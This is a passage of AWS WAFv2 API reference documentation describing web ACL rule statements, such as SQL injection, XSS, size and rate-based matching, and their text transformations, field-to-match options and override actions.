r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
PositionalConstraint (string) --
The area within the portion of a web request that you want AWS WAF to search for SearchString . Valid values include the following:
CONTAINS
The specified part of the web request must include the value of SearchString , but the location doesn\'t matter.
CONTAINS_WORD
The specified part of the web request must include the value of SearchString , and SearchString must contain only alphanumeric characters or underscore (A-Z, a-z, 0-9, or _). In addition, SearchString must be a word, which means that both of the following are true:
SearchString is at the beginning of the specified part of the web request or is preceded by a character other than an alphanumeric character or underscore (_). Examples include the value of a header and ;BadBot .
SearchString is at the end of the specified part of the web request or is followed by a character other than an alphanumeric character or underscore (_), for example, BadBot; and -BadBot; .
EXACTLY
The value of the specified part of the web request must exactly match the value of SearchString .
STARTS_WITH
The value of SearchString must appear at the beginning of the specified part of the web request.
ENDS_WITH
The value of SearchString must appear at the end of the specified part of the web request.
SqliMatchStatement (dict) --
Attackers sometimes insert malicious SQL code into web requests in an effort to extract data from your database. To allow or block web requests that appear to contain malicious SQL code, create one or more SQL injection match conditions. An SQL injection match condition identifies the part of web requests, such as the URI or the query string, that you want AWS WAF to inspect. Later in the process, when you create a web ACL, you specify whether to allow or block requests that appear to contain malicious SQL code.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
XssMatchStatement (dict) --
A rule statement that defines a cross-site scripting (XSS) match search for AWS WAF to apply to web requests. XSS attacks are those where the attacker uses vulnerabilities in a benign website as a vehicle to inject malicious client-site scripts into other legitimate web browsers. The XSS match statement provides the location in requests that you want AWS WAF to search and text transformations to use on the search area before AWS WAF searches for character sequences that are likely to be malicious strings.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
SizeConstraintStatement (dict) --
A rule statement that compares a number of bytes against the size of a request component, using a comparison operator, such as greater than (>) or less than (<). For example, you can use a size constraint statement to look for query strings that are longer than 100 bytes.
If you configure AWS WAF to inspect the request body, AWS WAF inspects only the first 8192 bytes (8 KB). If the request body for your web requests never exceeds 8192 bytes, you can create a size constraint condition and block requests that have a request body greater than 8192 bytes.
If you choose URI for the value of Part of the request to filter on, the slash (/) in the URI counts as one character. For example, the URI /logo.jpg is nine characters long.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
ComparisonOperator (string) --
The operator to use to compare the request part to the size setting.
Size (integer) --
The size, in byte, to compare to the request part, after any transformations.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
GeoMatchStatement (dict) --
A rule statement used to identify web requests based on country of origin.
CountryCodes (list) --
An array of two-character country codes, for example, [ "US", "CN" ] , from the alpha-2 country ISO codes of the ISO 3166 international standard.
(string) --
RuleGroupReferenceStatement (dict) --
A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --
The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
IPSetReferenceStatement (dict) --
A rule statement used to detect web requests coming from particular IP addresses or address ranges. To use this, create an IPSet that specifies the addresses you want to detect, then use the ARN of that set in this statement. To create an IP set, see CreateIPSet .
Each IP set rule statement references an IP set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.
ARN (string) --
The Amazon Resource Name (ARN) of the IPSet that this statement references.
RegexPatternSetReferenceStatement (dict) --
A rule statement used to search web request components for matches with regular expressions. To use this, create a RegexPatternSet that specifies the expressions that you want to detect, then use the ARN of that set in this statement. A web request matches the pattern set rule statement if the request component matches any of the patterns in the set. To create a regex pattern set, see CreateRegexPatternSet .
Each regex pattern set rule statement references a regex pattern set. You create and maintain the set independent of your rules. This allows you to use the single set in multiple rules. When you update the referenced set, AWS WAF automatically updates all rules that reference it.
ARN (string) --
The Amazon Resource Name (ARN) of the RegexPatternSet that this statement references.
FieldToMatch (dict) --
The part of a web request that you want AWS WAF to inspect. For more information, see FieldToMatch .
SingleHeader (dict) --
Inspect a single header. Provide the name of the header to inspect, for example, User-Agent or Referer . This setting isn\'t case sensitive.
Name (string) --
The name of the query header to inspect.
SingleQueryArgument (dict) --
Inspect a single query argument. Provide the name of the query argument to inspect, such as UserName or SalesRegion . The name can be up to 30 characters long and isn\'t case sensitive.
This is used only to indicate the web request component for AWS WAF to inspect, in the FieldToMatch specification.
Name (string) --
The name of the query argument to inspect.
AllQueryArguments (dict) --
Inspect all query arguments.
UriPath (dict) --
Inspect the request URI path. This is the part of a web request that identifies a resource, for example, /images/daily-ad.jpg .
QueryString (dict) --
Inspect the query string. This is the part of a URL that appears after a ? character, if any.
Body (dict) --
Inspect the request body, which immediately follows the request headers. This is the part of a request that contains any additional data that you want to send to your web server as the HTTP request body, such as data from a form.
Note that only the first 8 KB (8192 bytes) of the request body are forwarded to AWS WAF for inspection by the underlying host service. If you don\'t need to inspect more than 8 KB, you can guarantee that you don\'t allow additional bytes in by combining a statement that inspects the body of the web request, such as ByteMatchStatement or RegexPatternSetReferenceStatement , with a SizeConstraintStatement that enforces an 8 KB size limit on the body of the request. AWS WAF doesn\'t support inspecting the entire contents of web requests whose bodies exceed the 8 KB limit.
Method (dict) --
Inspect the HTTP method. The method indicates the type of operation that the request is asking the origin to perform.
TextTransformations (list) --
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection. If you specify one or more transformations in a rule statement, AWS WAF performs all transformations on the content of the request component identified by FieldToMatch , starting from the lowest priority setting, before inspecting the content for a match.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Text transformations eliminate some of the unusual formatting that attackers use in web requests in an effort to bypass detection.
Priority (integer) --
Sets the relative processing order for multiple transformations that are defined for a rule statement. AWS WAF processes all transformations, from lowest priority to highest, before inspecting the transformed content. The priorities don\'t need to be consecutive, but they must all be different.
Type (string) --
You can specify the following transformation types:
CMD_LINE
When you\'re concerned that attackers are injecting an operating system command line command and using unusual formatting to disguise some or all of the command, use this option to perform the following transformations:
Delete the following characters: " \' ^
Delete spaces before the following characters: / (
Replace the following characters with a space: , ;
Replace multiple spaces with one space
Convert uppercase letters (A-Z) to lowercase (a-z)
COMPRESS_WHITE_SPACE
Use this option to replace the following characters with a space character (decimal 32):
f, formfeed, decimal 12
t, tab, decimal 9
n, newline, decimal 10
r, carriage return, decimal 13
v, vertical tab, decimal 11
non-breaking space, decimal 160
COMPRESS_WHITE_SPACE also replaces multiple spaces with one space.
HTML_ENTITY_DECODE
Use this option to replace HTML-encoded characters with unencoded characters. HTML_ENTITY_DECODE performs the following operations:
Replaces (ampersand)quot; with "
Replaces (ampersand)nbsp; with a non-breaking space, decimal 160
Replaces (ampersand)lt; with a "less than" symbol
Replaces (ampersand)gt; with >
Replaces characters that are represented in hexadecimal format, (ampersand)#xhhhh; , with the corresponding characters
Replaces characters that are represented in decimal format, (ampersand)#nnnn; , with the corresponding characters
LOWERCASE
Use this option to convert uppercase letters (A-Z) to lowercase (a-z).
URL_DECODE
Use this option to decode a URL-encoded value.
NONE
Specify NONE if you don\'t want any text transformations.
RateBasedStatement (dict) --
A rate-based rule tracks the rate of requests for each originating IP address, and triggers the rule action when the rate exceeds a limit that you specify on the number of requests in any 5-minute time span. You can use this to put a temporary block on requests from an IP address that is sending excessive requests.
When the rule action triggers, AWS WAF blocks additional requests from the IP address until the request rate falls below the limit.
You can optionally nest another statement inside the rate-based statement, to narrow the scope of the rule so that it only counts requests that match the nested statement. For example, based on recent requests that you have seen from an attacker, you might create a rate-based rule with a nested AND rule statement that contains the following nested statements:
An IP match statement with an IP set that specified the address 192.0.2.44.
A string match statement that searches in the User-Agent header for the string BadBot.
In this rate-based rule, you also define a rate limit. For this example, the rate limit is 1,000. Requests that meet both of the conditions in the statements are counted. If the count exceeds 1,000 requests per five minutes, the rule action triggers. Requests that do not meet both conditions are not counted towards the rate limit and are not affected by this rule.
You cannot nest a RateBasedStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
Limit (integer) --
The limit on requests per 5-minute period for a single originating IP address. If the statement includes a ScopDownStatement , this limit is applied only to the requests that match the statement.
AggregateKeyType (string) --
Setting that indicates how to aggregate the request counts. Currently, you must set this to IP . The request counts are aggregated on IP addresses.
ScopeDownStatement (dict) --
An optional nested statement that narrows the scope of the rate-based statement to matching web requests. This can be any nestable statement, and you can nest statements at any level below this scope-down statement.
AndStatement (dict) --
A logical rule statement used to combine other rule statements with AND logic. You provide more than one Statement within the AndStatement .
Statements (list) --
The statements to combine with AND logic. You can use any statements that can be nested.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.
OrStatement (dict) --
A logical rule statement used to combine other rule statements with OR logic. You provide more than one Statement within the OrStatement .
Statements (list) --
The statements to combine with OR logic. You can use any statements that can be nested.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
The processing guidance for a Rule , used by AWS WAF to determine whether a web request matches the rule.
NotStatement (dict) --
A logical rule statement used to negate the results of another rule statement. You provide one Statement within the NotStatement .
Statement (dict) --
The statement to negate. You can use any statement that can be nested.
ManagedRuleGroupStatement (dict) --
A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --
The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --
The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --
The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
Action (dict) --
The action that AWS WAF should take on a web request when it matches the rule statement. Settings at the web ACL level can override the rule action setting.
This is used only for rules whose statements do not reference a rule group. Rule statements that reference a rule group include RuleGroupReferenceStatement and ManagedRuleGroupStatement .
You must specify either this Action setting or the rule OverrideAction setting, but not both:
If the rule statement does not reference a rule group, use this rule action setting and not the rule override action setting.
If the rule statement references a rule group, use the override action setting and not this action setting.
Block (dict) --
Instructs AWS WAF to block the web request.
Allow (dict) --
Instructs AWS WAF to allow the web request.
Count (dict) --
Instructs AWS WAF to count the web request and allow it.
OverrideAction (dict) --
The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --
Override the rule action setting to count.
None (dict) --
Don\'t override the rule action setting.
VisibilityConfig (dict) --
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --
A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --
A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --
A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
VisibilityConfig (dict) --
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --
A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --
A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --
A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
Capacity (integer) --
The web ACL capacity units (WCUs) currently being used by this web ACL.
AWS WAF uses WCUs to calculate and control the operating resources that are used to run your rules, rule groups, and web ACLs. AWS WAF calculates capacity differently for each rule type, to reflect the relative cost of each rule. Simple rules that cost little to run use fewer WCUs than more complex rules that use more processing power. Rule group capacity is fixed at creation, which helps users plan their web ACL WCU usage when they use a rule group. The WCU limit for web ACLs is 1,500.
PreProcessFirewallManagerRuleGroups (list) --
The first set of rules for AWS WAF to process in the web ACL. This is defined in an AWS Firewall Manager WAF policy and contains only rule group references. You can\'t alter these. Any rules and rule groups that you define for the web ACL are prioritized after these.
In the Firewall Manager WAF policy, the Firewall Manager administrator can define a set of rule groups to run first in the web ACL and a set of rule groups to run last. Within each set, the administrator prioritizes the rule groups, to determine their relative processing order.
(dict) --
A rule group that\'s defined for an AWS Firewall Manager WAF policy.
Name (string) --
The name of the rule group. You cannot change the name of a rule group after you create it.
Priority (integer) --
If you define more than one rule group in the first or last Firewall Manager rule groups, AWS WAF evaluates each request against the rule groups in order, starting from the lowest priority setting. The priorities don\'t need to be consecutive, but they must all be different.
FirewallManagerStatement (dict) --
The processing guidance for an AWS Firewall Manager rule. This is like a regular rule Statement , but it can only contain a rule group reference.
ManagedRuleGroupStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --
The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --
The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --
The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
RuleGroupReferenceStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a RuleGroup . To use this, create a rule group with your rules, then provide the ARN of the rule group in this statement.
You cannot nest a RuleGroupReferenceStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
ARN (string) --
The Amazon Resource Name (ARN) of the entity.
ExcludedRules (list) --
The names of rules that are in the referenced rule group, but that you want AWS WAF to exclude from processing for this rule statement.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
Name (string) --
The name of the rule to exclude.
OverrideAction (dict) --
The override action to apply to the rules in a rule group. Used only for rule statements that reference a rule group, like RuleGroupReferenceStatement and ManagedRuleGroupStatement .
Set the override action to none to leave the rule actions in effect. Set it to count to only count matches, regardless of the rule action settings.
In a Rule , you must specify either this OverrideAction setting or the rule Action setting, but not both:
If the rule statement references a rule group, use this override action setting and not the action setting.
If the rule statement does not reference a rule group, use the rule action setting and not this rule override action setting.
Count (dict) --
Override the rule action setting to count.
None (dict) --
Don\'t override the rule action setting.
VisibilityConfig (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Defines and enables Amazon CloudWatch metrics and web request sample collection.
SampledRequestsEnabled (boolean) --
A boolean indicating whether AWS WAF should store a sampling of the web requests that match the rules. You can view the sampled requests through the AWS WAF console.
CloudWatchMetricsEnabled (boolean) --
A boolean indicating whether the associated resource sends metrics to CloudWatch. For the list of available metrics, see AWS WAF Metrics .
MetricName (string) --
A name of the CloudWatch metric. The name can contain only alphanumeric characters (A-Z, a-z, 0-9), with length from one to 128 characters. It can\'t contain whitespace or metric names reserved for AWS WAF, for example "All" and "Default_Action." You can\'t change a MetricName after you create a VisibilityConfig .
PostProcessFirewallManagerRuleGroups (list) --
The last set of rules for AWS WAF to process in the web ACL. This is defined in an AWS Firewall Manager WAF policy and contains only rule group references. You can\'t alter these. Any rules and rule groups that you define for the web ACL are prioritized before these.
In the Firewall Manager WAF policy, the Firewall Manager administrator can define a set of rule groups to run first in the web ACL and a set of rule groups to run last. Within each set, the administrator prioritizes the rule groups, to determine their relative processing order.
(dict) --
A rule group that\'s defined for an AWS Firewall Manager WAF policy.
Name (string) --
The name of the rule group. You cannot change the name of a rule group after you create it.
Priority (integer) --
If you define more than one rule group in the first or last Firewall Manager rule groups, AWS WAF evaluates each request against the rule groups in order, starting from the lowest priority setting. The priorities don\'t need to be consecutive, but they must all be different.
FirewallManagerStatement (dict) --
The processing guidance for an AWS Firewall Manager rule. This is like a regular rule Statement , but it can only contain a rule group reference.
ManagedRuleGroupStatement (dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
A rule statement used to run the rules that are defined in a managed rule group. To use this, provide the vendor name and the name of the rule group in this statement. You can retrieve the required names by calling ListAvailableManagedRuleGroups .
You can\'t nest a ManagedRuleGroupStatement , for example for use inside a NotStatement or OrStatement . It can only be referenced as a top-level statement within a rule.
VendorName (string) --
The name of the managed rule group vendor. You use this, along with the rule group name, to identify the rule group.
Name (string) --
The name of the managed rule group. You use this, along with the vendor name, to identify the rule group.
ExcludedRules (list) --
The rules whose actions are set to COUNT by the web ACL, regardless of the action that is set on the rule. This effectively excludes the rule from acting on web requests.
(dict) --
Note
This is the latest version of AWS WAF , named AWS WAFV2, released in November, 2019. For information, including how to migrate your AWS WAF resources from the prior release, see the AWS WAF Developer Guide .
Specifies a single rule to exclude from the rule group. Excluding a rule overrides its action setting for the rule group in the web ACL, setting it to COUNT . This effectively excludes the rule from acting on web requests.
